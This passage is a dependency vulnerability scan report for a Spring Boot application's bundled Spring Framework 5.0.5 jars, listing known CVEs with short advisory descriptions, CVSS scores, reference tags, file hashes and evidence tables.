OSSINDEX - [CVE-2018-15756] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15756 OSSIndex - https://pivotal.io/security/cve-2018-15756 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,URL_REPURPOSED,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,URL_REPURPOSED,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5398
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-494 Download of Code Without Integrity Check
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.6) Vector: /AV:N/AC:H/Au:N/C:C/I:C/A:C References:
Vulnerable Software & Versions:
CVE-2018-1257
Spring Framework, versions 5.0.x prior to 5.0.6, versions 4.3.x prior to 4.3.17, and older unsupported versions allows applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a regular expression denial of service attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
OSSINDEX - [CVE-2018-1257] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1257 OSSIndex - https://jira.spring.io/browse/SPR-16731 OSSIndex - https://pivotal.io/security/cve-2018-1257 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5421
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N/E:1.3/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.6) Vector: /AV:N/AC:H/Au:S/C:P/I:P/A:N References:
OSSINDEX - [CVE-2020-5421] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5421 OSSIndex - https://tanzu.vmware.com/security/cve-2020-5421 af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security@pivotal.io - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - THIRD_PARTY_ADVISORY security@pivotal.io - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-22950
In Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions:
CVE-2023-20861
In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2018-11039
Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11039] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11039 OSSIndex - https://jira.spring.io/browse/SPR-16836 OSSIndex - https://pivotal.io/security/cve-2018-11039 af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - MITIGATION,VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-22968
In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. CWE-178 Improper Handling of Case Sensitivity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions:
CVE-2022-22970
In Spring Framework versions prior to 5.3.20+, 5.2.22+ and older unsupported versions, applications that handle file uploads are vulnerable to a DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions:
CVE-2025-22233 (OSSINDEX)
CVE-2024-38820 ensured Locale-independent, lowercase conversion for both the configured disallowedFields patterns and for request parameter names. However, there are still cases where it is possible to bypass the disallowedFields checks.
Affected Spring Products and Versions
Spring Framework:
* 6.2.0 - 6.2.6
* 6.1.0 - 6.1.19
* 6.0.0 - 6.0.27
* 5.3.0 - 5.3.42
* Older, unsupported versions are also affected
Mitigation
Users of affected versions should upgrade to the corresponding fixed version.
Affected version(s) | Fix Version | Availability
6.2.x | 6.2.7 | OSS
6.1.x | 6.1.20 | OSS
6.0.x | 6.0.28 | Commercial https://enterprise.spring.io/
5.3.x | 5.3.43 | Commercial https://enterprise.spring.io/
No further mitigation steps are necessary.
Generally, we recommend using a dedicated model object with properties only for data binding, or using constructor binding since constructor arguments explicitly declare what to bind together with turning off setter binding through the declarativeBinding flag. See the Model Design section in the reference documentation.
For setting binding, prefer the use of allowedFields (an explicit list) over disallowedFields.
Credit
This issue was responsibly reported by the TERASOLUNA Framework Development Team from NTT DATA Group Corporation.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2025-22233 for details CWE-20 Improper Input Validation
CVSSv2:
Base Score: LOW (2.3) Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-context:5.0.5.RELEASE:*:*:*:*:*:*:*
spring-music-sqldb-1.0.jar: spring-core-5.0.5.RELEASE.jar
Description:
Spring Core
License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-core-5.0.5.RELEASE.jar
MD5: 988f815ea07b27f70cc2932c4b8c8392
SHA1: 1bd9feb1d9dac6accd27f5244b6c47cfcb55045c
SHA256: 49fd3a5ae95ad46cd3b43302150246fdb4abeb1f99fad0ea8c843ec79092ba69
Evidence
Type | Source | Name | Value | Confidence
Vendor | central | artifactid | spring-core | Highest
Vendor | central | groupid | org.springframework | Highest
Vendor | file | name | spring-core | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | core | Highest
Vendor | jar | package name | core | Low
Vendor | jar | package name | springframework | Low
Vendor | Manifest | automatic-module-name | spring.core | Medium
Vendor | pom | artifactid | spring-core | Low
Vendor | pom | developer email | jhoeller@pivotal.io | Low
Vendor | pom | developer id | jhoeller | Medium
Vendor | pom | developer name | Juergen Hoeller | Medium
Vendor | pom | groupid | org.springframework | Highest
Vendor | pom | name | Spring Core | High
Vendor | pom | organization name | Spring IO | High
Vendor | pom | organization url | http://projects.spring.io/spring-framework | Medium
Vendor | pom | url | spring-projects/spring-framework | Highest
Product | central | artifactid | spring-core | Highest
Product | file | name | spring-core | High
Product | hint analyzer | product | springsource_spring_framework | Highest
Product | jar | package name | core | Highest
Product | jar | package name | core | Low
Product | Manifest | automatic-module-name | spring.core | Medium
Product | Manifest | Implementation-Title | spring-core | High
Product | pom | artifactid | spring-core | Highest
Product | pom | developer email | jhoeller@pivotal.io | Low
Product | pom | developer id | jhoeller | Low
Product | pom | developer name | Juergen Hoeller | Low
Product | pom | groupid | org.springframework | Highest
Product | pom | name | Spring Core | High
Product | pom | organization name | Spring IO | Low
Product | pom | organization url | http://projects.spring.io/spring-framework | Low
Product | pom | url | spring-projects/spring-framework | High
Version | central | version | 5.0.5.RELEASE | Highest
Version | Manifest | Implementation-Version | 5.0.5.RELEASE | High
Version | pom | version | 5.0.5.RELEASE | Highest
Related Dependencies
spring-music-sqldb-1.0.jar: spring-aop-5.0.5.RELEASE.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-aop-5.0.5.RELEASE.jar
MD5: cadac0a0a42d54e5a94ab13e9824ee73
SHA1: b11b61b94d7fb752a1c9bf3461d655c3084fae47
SHA256: 347b27caecd859a6e62aa40dd5868f9a3e76e03fccea70e10c1ddba5bf177b3d
pkg:maven/org.springframework/spring-aop@5.0.5.RELEASE
spring-music-sqldb-1.0.jar: spring-aspects-5.0.5.RELEASE.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-aspects-5.0.5.RELEASE.jar
MD5: 2d1900f8ef64edc7a65af133c86a7e21
SHA1: 34994566374425cfdf82634720b010ed20be512d
SHA256: 91b698da905943f2339ed3d3edb498ab30fdc5d5a4692acd27bde99a3bb41195
pkg:maven/org.springframework/spring-aspects@5.0.5.RELEASE
spring-music-sqldb-1.0.jar: spring-beans-5.0.5.RELEASE.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-beans-5.0.5.RELEASE.jar
MD5: 90a6ee8a8d1db99deed70a1ec2724fd7
SHA1: 984445863c0bbdaaf860615762d998b471a6bf92
SHA256: dab1f19aafd2d53137c886b806cdc2a4f2193e66f55b96a37d10fb92fd204663
pkg:maven/org.springframework/spring-beans@5.0.5.RELEASE
spring-music-sqldb-1.0.jar: spring-context-support-5.0.5.RELEASE.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-context-support-5.0.5.RELEASE.jar
MD5: 71a328d065455ddc7cf24b37e13b0e5e
SHA1: 109c6bf2e869f055728219b361c78102de434158
SHA256: ddb4e0ae18c6c5c3c296bfb24b5ea0f8aa8bd54c5b43908488afa97ab07e87aa
pkg:maven/org.springframework/spring-context-support@5.0.5.RELEASE
spring-music-sqldb-1.0.jar: spring-jcl-5.0.5.RELEASE.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-jcl-5.0.5.RELEASE.jar
MD5: e0f5ea39bc55be9f60a12ca2d8d48ec2
SHA1: f4a2854b9d865e8b86717595aec16f877f8c6489
SHA256: 285ac46f7a2a8d1ebeefbbf0d53d0b19a81cccb4f2bb4b79bf1a8d6720f208c8
pkg:maven/org.springframework/spring-jcl@5.0.5.RELEASE
spring-music-sqldb-1.0.jar: spring-jdbc-5.0.5.RELEASE.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-jdbc-5.0.5.RELEASE.jar
MD5: 20baf804148676045ef08363d638a69a
SHA1: 456bc4d2281c37aa2f2206651a3048a1d3559d2a
SHA256: 8439c614146b0d13689f25b1c261e428f7f70c2cd27b56accf8f8a5d9f1f33be
pkg:maven/org.springframework/spring-jdbc@5.0.5.RELEASE
spring-music-sqldb-1.0.jar: spring-orm-5.0.5.RELEASE.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-orm-5.0.5.RELEASE.jar
MD5: a5aa940f69ab3e8eaa74a78351e7409b
SHA1: 6734f5ef4c2ebf1d00021fd4b314138f10792174
SHA256: 953a8460e3c6ae10bc3d1a03ec1c941f482148fa9d5306f75f20088bd39bdcf5
pkg:maven/org.springframework/spring-orm@5.0.5.RELEASE
spring-music-sqldb-1.0.jar: spring-oxm-5.0.5.RELEASE.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-oxm-5.0.5.RELEASE.jar
MD5: 568c7d340722850fd1cb29afcd4fd8d8
SHA1: cf4dcac4ed1ba50bfe681e1e51a0c6a616782dd0
SHA256: c804544ec756d7c79f72e83f34684f353e0146c48d59677b945e0813dc418a9a
pkg:maven/org.springframework/spring-oxm@5.0.5.RELEASE
spring-music-sqldb-1.0.jar: spring-tx-5.0.5.RELEASE.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-tx-5.0.5.RELEASE.jar
MD5: b30070684e5049de9a45c27ddc2cce86
SHA1: b772fbba533da282adc89f33e2619ee8a8bba601
SHA256: 15504d883a21315dc22a00487e0078fb5b50b25bdfe3e55bd545301c98f12f42
pkg:maven/org.springframework/spring-tx@5.0.5.RELEASE
CVE-2022-22965
CISA Known Exploited Vulnerability: Product: VMware Spring Framework Name: Spring Framework JDK 9+ Remote Code Execution Vulnerability Date Added: 2022-04-04 Description: Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. Required Action: Apply updates per vendor instructions. Due Date: 2022-04-25 Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-22965
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - US_GOVERNMENT_RESOURCE security@vmware.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security@vmware.com - MITIGATION,VENDOR_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-1258
Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. CWE-863 Incorrect Authorization
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P References:
OSSINDEX - [CVE-2018-1258] CWE-863: Incorrect Authorization OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1258 OSSIndex - https://jira.spring.io/browse/SPR-16757 OSSIndex - https://pivotal.io/security/cve-2018-1258 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - 
THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2024-22259
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect (https://cwe.mitre.org/data/definitions/601.html) attack or to an SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22243 (https://spring.io/security/cve-2024-22243), but with different input. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2018-11040
Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the "jsonp" and "callback" JSONP parameters, enabling cross-domain requests. CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11040
OSSIndex - https://jira.spring.io/browse/SPR-16798
OSSIndex - https://pivotal.io/security/cve-2018-11040
Vulnerable Software & Versions:
CVE-2018-15756
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2018-15756] CWE-noinfo
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15756
OSSIndex - https://pivotal.io/security/cve-2018-15756
Vulnerable Software & Versions:
CVE-2020-5398
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-494 Download of Code Without Integrity Check
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.6) Vector: /AV:N/AC:H/Au:N/C:C/I:C/A:C References:
Vulnerable Software & Versions:
CVE-2018-1257
Spring Framework, versions 5.0.x prior to 5.0.6, versions 4.3.x prior to 4.3.17, and older unsupported versions allows applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a regular expression denial of service attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
